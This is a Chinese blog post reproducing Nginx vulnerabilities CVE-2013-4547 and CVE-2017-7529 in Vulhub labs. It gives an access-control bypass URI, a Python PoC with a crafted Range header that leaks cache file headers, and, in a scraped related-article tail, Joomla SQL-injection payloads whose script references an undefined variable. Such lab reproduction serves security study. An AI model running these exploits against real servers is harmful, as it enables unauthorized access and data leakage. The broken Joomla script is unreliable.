Nginx漏洞复现1

最新推荐文章于 2025-04-27 19:06:59 发布
最新推荐文章于 2025-04-27 19:06:59 发布
阅读量3.6k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: nginx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq115399231/article/details/97652123
版权

最近的漏洞复现就跟着vulhub做,感谢大佬做的环境和记录

CVE-2013-4547

漏洞介绍

影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7
这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。
举个例子,比如,Nginx匹配到.php结尾的请求,就发送给fastcgi进行解析,常见的写法如下:

location ~ \.php$ {
    include        fastcgi_params;

    fastcgi_pass   127.0.0.1:9000;
    fastcgi_index  index.php;
    fastcgi_param  SCRIPT_FILENAME  /var/www/html$fastcgi_script_name;
    fastcgi_param  DOCUMENT_ROOT /var/www/html;
}

我们构造1.jpg[20][00].php
比如很多网站限制了允许访问后台的IP:

location /admin/ {
    allow 127.0.0.1;
    deny all;
}

我们可以请求如下URI:
/test[0x20]/../admin/index.php,这个URI不会匹配上location后面的/admin/,也就绕过了其中的IP验证;但最后请求的是/test[0x20]/…/admin/index.php文件,也就是/admin/index.php,成功访问到后台。(这个前提是需要有一个目录叫test:这是Linux系统的特点,如果有一个不存在的目录,则即使跳转到上一层,也会爆文件不存在的错误,Windows下没有这个限制)

漏洞测试

在这里插入图片描述
上传成功
在这里插入图片描述
解析成功
需要注意的是我们上传和访问的文件都是1.jpg[20][00].php
在这里插入图片描述

Nginx越界读取缓存漏洞(CVE-2017-7529)

漏洞介绍

当使用Nginx标准模块时,攻击者可以通过发送包含恶意构造range域的header请求,来获取响应中的缓存文件头部信息。在某些配置中,缓存文件头可能包含后端服务器的IP地址或其它敏感信息,从而导致信息泄露。

影响版本

存在漏洞:Nginx version 0.5.6 - 1.13.2
修复版本:Nginx version 1.13.3, 1.12.1

漏洞利用

poc脚本:

#!/usr/bin/env python
import sys
import requests

if len(sys.argv) < 2:
    print("%s url" % (sys.argv[0]))
    print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
    sys.exit()

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
    n, 0x8000000000000000 - n)

r = requests.get(url, headers=headers)
print(r.text)

构造一个Range: bytes=-X, -Y
一大一小两个end值,只需要控制前面一个end值小而后一个end值大,从而实现start值和size值皆为负数,控制start值负到一个合适的位置,那么就能成功利用读到缓存文件头部了。
在这里插入图片描述
读取到缓存文件
参考文章:
https://cert.360.cn/warning/detail?id=b879782fbad4a7f773b6c18490d67ac7

12-4 Nginx漏洞复现与分析
weixin_43263566的博客
11-29 1805
CGl: CGl是一种协议,用于定义Nginx或其他Web Server传递的数据格式。CGl是一个独立的程序,与Web Server无关,可以用任何语言编写CGl程序,比如C、Perl、Python等。Fastcgi: Fastcgi:是一种协议,前身是CGI,可以简单理解为是优化版的CGI,具有更高的稳定性和性能。PHP-CGI: 只是一个PHP的解释器,本身只能解析请求并返回结果,不会做进程管理。
Nginx 解析漏洞复现
天天学安全专属博客
07-18 1242
Nginx 解析漏洞复现
nginx-1.10.2
07-19
Nginx是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,并在一个BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力确实在同类型的网页服务器中表现较好,中国大陆使用nginx网站用户有:百度、京东、新浪、网易、腾讯、淘宝等。
Docker nginx安全漏洞(CVE-2021-23017)版本升级到1.20.1
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
08-30 5713
一、背景 安全部门漏扫发现,某业务主机当前版本的nginx存在nginx 安全漏洞(CVE-2021-23017)风险,需要升级到最新版本的nginx,而本环境业务泡在Docker vm上,因此需要对原生的nginx版本升级和docker中的nginx版本都进行升级; 下面让我们来一起看下nginx升级到1.20.1稳定版的过程。 二、升级过程 2.1、升级前检查 1)备份旧版nginx文件 编译后的二进制文件:mv …/nginx-1.13.2/sbin/nginx nginx_old //新nginx
解决Nginx安全漏洞【CVE-2018-16844、CVE-2019-9511、CVE-2021-3618、CVE-2018-16843、CVE-2021-23017】等问题
最新发布
weixin_44554055的博客
04-27 431
Nginx安全漏洞升级方案
403 Forbidden nginx/1.20.1
猫头虎技术团队:授渔优于赠鱼,兴趣引领智慧,探索之乐尤显珍贵。商务合作+:Libin9iOak ,万粉变现+:优快云WF,猫头虎承诺每年免费为100名C站创作者做账号流量诊断服务!全网搜:猫头虎技术团队,点击文章底部名片或直接私信我一切皆可谈,快找虎哥!
06-08 6008
403 Forbidden nginx/1.20.于是查看nginx日志,路径为/var/log/nginx/error.log。打开日志发现报错Permission denied,详细报错如下: 没有权限?于是找了不少资料,可以通过下面四步排查解决此问题。你可能只是其中之前配置有问题,不一定四个步骤都用上。1.1查看nginx的启动用户,发现是nobody,而为是用root启动的 1.2nginx.config的user改为和启动用户一致, 修改 server_name localhost;
nginx漏洞复现(包含nginx的介绍,配置,访问控制等内容),是较全的nginx学习!
m0_67284865的博客
08-16 1万+
这篇文章包含nginx的介绍与配置,其中包含访问控制的安全,有漏洞复现案例:Nginx 文件名逻辑漏洞(CVE-2013-4547)Nginx越界读取缓存漏洞(CVE-2017-7529)Nginx 配置错误导致漏洞 Nginx 解析漏洞复现
linux nginx 漏洞利用,Nginx解析漏洞复现以及哥斯拉连接Webshell实践
weixin_29837797的博客
05-16 403
开心上传Webshell后,竟然连不上去,用Burpsuite抓包查看报了这个错误,具体的原因没有深究,百度了一下解决方法就是修改php.ini配置文件中的session.auto_start = 1 之前的phpinfo内有相关路径(/usr/local/etc/php/conf.d/php.ini) docker exec -t -i nginx_parsing_vulnerability_p...
Nginx漏洞复现
weixin_58163202的博客
02-08 1314
nignx漏洞复现
【Vulhub靶场】Nginx 中间件漏洞复现
M372109150的博客
05-02 4266
本文主要对nginx漏洞进行复现,在vulhub靶场复现nginx文件名逻辑漏洞Nginx越界读取缓存漏洞(CVE-2017-7529)、Nginx 配置错误导致漏洞以及解析漏洞
Vulhub靶场Nginx解析漏洞复现
mirliasheong的博客
12-21 808
原理:这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置⽂件中有⼀个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的⽂件,PHP就会向前递归解析。在⼀个⽂件/xx.jpg后⾯加上/.php会将 /xx.jpg/xx.php 解析为 php ⽂件。当Nginx得到⼀个⽤户请求时,⾸先对url进⾏解析,进⾏正则匹配,如果匹配到以.php后缀结尾的⽂件名,会将请求的PHP⽂件交给PHP-CGI去解析。上传成功,访问一下我们的文件,删除一个g,再抓包。再上传,发现上传成功了。
NGINX-RCE:nginx的rce漏洞利用
04-04
NGINX-RCE nginx的rce漏洞利用 怎么运行呢? 首先只需使用gcc gcc expl0itz.c -o expl0itz 然后chmod chmod +x expl0itz 像二进制文件一样运行之后! ./expl0itz
nginx 漏洞
亿光年
05-27 1797
      最近忙,很久都没来写博客了,nginx爆文件类型漏洞,我是直接受害者,5月20号提出的,我24号直到受害才知道。对这方面的关注与敏感度不够!大家可能对这个漏洞都是很熟悉了的。但我还是详细的说明一下的。nginx默认以cgi的方式支持php的运行,譬如在配置文件当中可以以location ~ /.php$ {root html;fastcgi_pass 127.0.0.1:900
不安全配置Nginx可能导致的安全漏洞
baidu_35776955的博客
10-25 6018
不安全配置Nginx可能导致的安全漏洞 2017-10-13 旗云科技 金融安全家 在渗透测试过程中发现很多网站使用了nginx或者tenginx来做反向代理,ningx的配置文件nginx.conf的一些错误配置可能引发一些安全漏洞。下面是总结的一些可能引发安全问题的错误配置,并且推荐了github上一款用于检测nginx安全配置的工具。 Ningx.conf配置一共分为4
漏洞复现Nginx配置漏洞
Blood_Pupil的博客
03-16 2518
上述各配置漏洞对应的造成漏洞的配置信息如下: CLRF #nginx.conf location / { return 302 https://$host$uri; } 目录遍历 #nginx.conf autoindex on; 目录穿越 #nginx.conf location /files { alias /home/; } add_h...
解决windows下403 Forbidden nginx/1.10.2
热门推荐
Bameirilyo的博客
03-24 1万+
在windows下 http服务器nginx时,访问web目录提示403 Forbidden,首先需要了解nginx出现403错误是什么意思:  403 Forbidden表示你在请求一个资源文件但是nginx不允许你查看,403 Forbidden 只是一个HTTP状态码,像404,200一样不是技术上的错误。      找到nginx.conf:        将user nobody 改为u...
nginx 安全漏洞(CVE-2021-23017) 版本升级
weixin_47980221的博客
10-27 1658
查看当前nginx版本信息 # ./sbin/nginx -V nginx version: nginx/1.20.1 built by gcc 4.8.5 20150623 (Red Hat 4.8.5-44) (GCC) configure arguments: --prefix=/home/nginx --add-module=/home/nginx-module/fastdfs-ng...
Nginx 拒接服务漏洞(CVE-2016-0747)整改
weixin_30588827的博客
12-01 882
Nginx的拒绝服务漏洞主要影响版本为1.10.3之前的版本,为不影响原有nginx的使用,且为避免修改其它配置文件,可以通过编译nginx最新版本的执行文件去替换旧的执行文件,文中的场景为由nginx1.8.0版本平滑升级到1.10.3版本,安装过程如下: 1nginx安装依赖如下安装包: openssl:http://www.openssl.org/source/ope...
joomla漏洞复现
03-23
### Joomla 漏洞复现教程 #### CVE 编号及相关信息 Joomla 的漏洞复现涉及多个不同的 CVE 编号,以下是几个常见的案例及其对应的描述: 1. **CVE-2023-23752**: 此漏洞是一个身份验证绕过问题,允许攻击者通过特定参数访问 REST API 并获取敏感数据,包括数据库连接用户名和密码。此漏洞影响的版本范围为 `4.0.0 <= Joomla <= 4.2.7`[^1]。 2. **CVE-2017-8917**: 这是一次严重的 SQL 注入漏洞,由新引入的组件 `com_fields` 引发。该漏洞存在于 Joomla 3.7.0 中,可能导致攻击者执行任意查询并窃取数据库中的重要信息[^3]。 3. **CVE-2017-12794**: 该漏洞属于跨站脚本 (XSS) 类型,可能被利用来注入恶意 JavaScript 脚本到网页中,从而控制用户的浏览器会话或窃取 Cookie 等敏感信息。可以通过 Docker 镜像快速搭建测试环境来进行复现[^4]。 --- #### 环境搭建指南 为了成功复现这些漏洞,通常需要准备一个可运行的目标环境。以下是以 CVE-2023-23752 和 CVE-2017-8917 为例的环境设置方法: ##### 使用 Docker 构建目标环境 Docker 提供了一种简单的方式来部署 Joomla 测试实例。可以拉取预构建镜像以减少手动配置的时间: ```bash docker pull medicean/vulapps:j_joomla_2 docker run -d --name joomla-vulnerable -p 8080:80 medicean/vulapps:j_joomla_2 ``` 这将启动一个带有已知漏洞的 Joomla 实例,并将其绑定到主机端口 8080 上。 ##### 手动安装 Joomla 如果希望更灵活地调整环境,则可以选择手动方式完成安装过程: 1. 下载对应版本的 Joomla 文件包; 2. 将其解压至 Web 服务器根目录下(如 Apache 或 Nginx); 3. 创建 MySQL 数据库及用户账户用于存储网站内容; 4. 访问站点 URL 开始初始化向导流程填写必要选项即可完成整个操作步骤说明如下图所示. --- #### 漏洞复现步骤 ##### 对于 CVE-2023-23752: 尝试构造请求以触发权限绕过的机制。例如,发送 GET 请求给 `/index.php?option=com_api&app=myapplication&format=json&public=true` 可能返回未经适当保护的数据集列表[^5]: ```http GET /index.php?option=com_api&app=myapplication&format=json&public=true HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 Accept-Encoding: gzip, deflate Connection: close ``` ##### 关于 CVE-2017-8917: 编写 POC 来展示如何利用 SQLi 获取管理员哈希值或其他机密资料。假设存在字段名称冲突情况下的拼接语句缺陷,那么下面这段 Python 脚本或许能够帮助理解原理: ```python import requests url = 'http://localhost/index.php' payloads = ["' OR SLEEP(5)--", "' UNION SELECT NULL--"] for payload in payloads: params = {'field_id': payload} response = requests.get(url, params=params) if "sleep" in payload and ("timeout" in str(response.elapsed)): print(f"[+] Vulnerable to Time-Based Blind Injection with {payload}") elif "union" in payload.lower() and len(response.text.splitlines()) > expected_line_count: print("[+] Possible Union Query Based Injection Detected!") ``` --- #### §相关问题§ 1. 如何检测远程服务器上是否存在某个具体的 Joomla 版本? 2. 是否有其他类似的 CMS 系统也遭受过相似类型的漏洞威胁?如果有,请列举至少两个例子。 3. 在实际渗透测试过程中遇到防护措施较强的情况下,除了直接利用公开披露的方法外还有哪些技巧可以帮助发现隐藏的安全隐患呢? 4. 当前主流框架对于防止此类安全风险采取了哪些通用策略?它们各自优缺点是什么样的状况之下适用最为广泛有效果最佳的选择方案又有哪些考虑因素需要注意事项等等一系列关联话题探讨交流分享经验教训共同进步成长成为更好的自己吧朋友们加油哦😊
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值